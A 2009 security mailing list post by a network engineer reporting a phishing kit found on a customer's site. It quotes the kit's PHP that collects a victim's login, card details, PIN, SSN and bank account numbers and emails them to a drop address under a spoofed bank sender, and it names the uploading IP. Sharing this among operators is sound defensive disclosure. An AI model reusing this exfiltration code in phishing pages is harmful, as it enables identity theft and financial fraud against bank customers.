[nsp-sec] yahoo (ymail.com) phish dropbox
Jon Lewis
jlewis at lewis.org
Wed Nov 25 21:10:41 EST 2009
Taken from a phishing set of pages uploaded to a customer's site:
//sending email info here
$subj = "[ CC: $card | EXP: $expm / $expy | CVV: $cvv | PIN: $pin | SSN: $s1-$s2-$s3 ]";
$msg = "Username: $username\nPassword: $password\n\nCardHolder Name: $name\nDate
of Birth: $month / $day / $year\nMother Maiden Name: $mother\nAddress: $address
, $city, $state, $zip\nPhone Number: $phone\nE-mail Address: $email\n\nCard Numb
er: $card\nExpiration Date: $expm / $expy\nCvv: $cvv\nPin: $pin\nSsn: $s1-$s2-$s
3\nAccount Number: $account\nRouting Number: $routing\n\n[ IP: $ip | $date ]";
$from = "From: US Bank <admin at x8762-xm762-m7x63.com>";
mail("vip.coty at ymail.com", $subj, $msg, $from);
Surprisingly, this one was uploaded (FTP, web site credentials probably
phished) from SBC IP space (99.187.232.70) this afternoon and not
from Romania which is where they've all been coming from recently.
AS | IP | AS Name
7132 | 99.187.232.70 | SBIS-AS - AT&T Internet Services
----------------------------------------------------------------------
Jon Lewis | I route
Senior Network Engineer | therefore you are
Atlantic Net |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________
More information about the nsp-security
mailing list